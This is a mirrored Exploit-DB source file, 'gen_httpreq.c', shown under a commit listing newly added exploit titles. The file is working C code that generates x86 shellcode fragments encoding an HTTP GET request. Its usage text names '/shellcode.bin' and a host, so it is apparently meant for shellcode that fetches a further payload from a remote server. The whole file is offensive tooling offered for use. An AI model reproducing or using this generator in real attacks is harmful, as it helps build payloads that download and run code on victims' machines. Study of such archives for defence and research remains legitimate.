bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/generator/shellcode/13288.c
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

182 lines
No EOL
3.6 KiB
C
Executable file
Raw Blame History

/*
* gen_httpreq.c, utility for generating HTTP/1.x requests for shellcodes
*
* SIZES:
*
* HTTP/1.0 header request size - 18 bytes+
* HTTP/1.1 header request size - 26 bytes+
*
* NOTE: The length of the selected HTTP header is stored at EDX register.
* Thus the generated MOV instruction (to EDX/DX/DL) is size-based.
*
* - izik@tty64.org
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdarg.h>
#include <string.h>
#define X86_PUSH \
0x68
#define X86_MOV_TO_DL(x) \
printf("\t\"\\xb2\\x%02x\"\n", x & 0xFF);
#define X86_MOV_TO_DX(x) \
printf("\t\"\\x66\\xba\\x%02x\\x%02x\"\n", \
(x & 0xFF), ((x >> 8) & 0xFF));
#define X86_MOV_TO_EDX(x) \
printf("\t\"\\xba\\x%02x\\x%02x\\x%02x\\x%02x\"\n", \
(x & 0xFF), ((x >> 8) & 0xFF), ((x >> 16) & 0xFF), ((x >> 24) & 0xFF));
void usage(char *);
int printx(char *fmt, ...);
int main(int argc, char **argv) {
if (argc < 2) {
usage(argv[0]);
return -1;
}
if (argv[2][0] != '/') {
fprintf(stderr, "filename must begin with '/' as any sane URL! (e.g. /index.html)\n");
return -1;
}
if (!strcmp(argv[1], "-0")) {
return printx("GET %s HTTP/1.0\r\n\r\n", argv[2]);
}
if (!strcmp(argv[1], "-1")) {
if (argc != 4) {
fprintf(stderr, "missing <host>, required parameter for HTTP/1.1 header! (e.g. www.tty64.org)\n");
return -1;
}
return printx("GET %s HTTP/1.1\r\nHost: %s\r\n\r\n", argv[2], argv[3]);
}
fprintf(stderr, "%s: unknown http protocol, try -0 or -1\n", argv[1]);
return -1;
}
/*
* usage, display usage screen
* * basename, barrowed argv[0]
*/
void usage(char *basename) {
printf(
"usage: %s <-0|-1> <filename> [<host>]\n\n"
"\t -0, HTTP/1.0 GET request\n"
"\t -1, HTTP/1.1 GET request\n"
"\t <filename>, given filename (e.g. /shellcode.bin)\n"
"\t <host>, given hostname (e.g. www.tty64.org) [required for HTTP 1.1]\n\n",
basename);
return ;
}
/*
* printx, fmt string. generate the shellcode chunk
* * fmt, given format string
*/
int printx(char *fmt, ...) {
va_list ap;
char buf[256], pad_buf[4], *w_buf;
int pad_length, buf_length, i, tot_length;
memset(buf, 0x0, sizeof(buf));
va_start(ap, fmt);
vsnprintf(buf, sizeof(buf), fmt, ap);
va_end(ap);
buf_length = strlen(buf);
printf("\nURL: %s\n", buf);
printf("Header Length: %d bytes\n", buf_length);
for (i = 1; buf_length > (i * 4); i++) {
pad_length = ((i+1)*4) - buf_length;
}
printf("Padding Length: %d bytes\n\n", pad_length);
tot_length = buf_length + pad_length;
w_buf = buf;
if (pad_length) {
w_buf = calloc(tot_length, sizeof(char));
if (!w_buf) {
perror("calloc");
return -1;
}
i = index(buf, '/') - buf;
memset(pad_buf, 0x2f, sizeof(pad_buf));
memcpy(w_buf, buf, i);
memcpy(w_buf+i, pad_buf, pad_length);
memcpy(w_buf+pad_length+i, buf+i, buf_length - i);
}
for (i = tot_length - 1; i > -1; i-=4) {
printf("\t\"\\x%02x\\x%02x\\x%02x\\x%02x\\x%02x\" // pushl $0x%02x%02x%02x%02x\n",
X86_PUSH, w_buf[i-3], w_buf[i-2], w_buf[i-1], w_buf[i], w_buf[i-3], w_buf[i-2], w_buf[i-1], w_buf[i]);
}
if (pad_length) {
free(w_buf);
}
//
// The EDX register is assumed to be zero-out within the shellcode.
//
if (tot_length < 256) {
// 8bit value
X86_MOV_TO_DL(tot_length);
} else if (tot_length < 655356) {
// 16bit value
X86_MOV_TO_DX(tot_length);
} else {
// 32bit value, rarely but possible ;-)
X86_MOV_TO_EDX(tot_length);
}
fputc('\n', stdout);
return 1;
}
// milw0rm.com [2006-10-22]
Reference in a new issue View git blame Copy permalink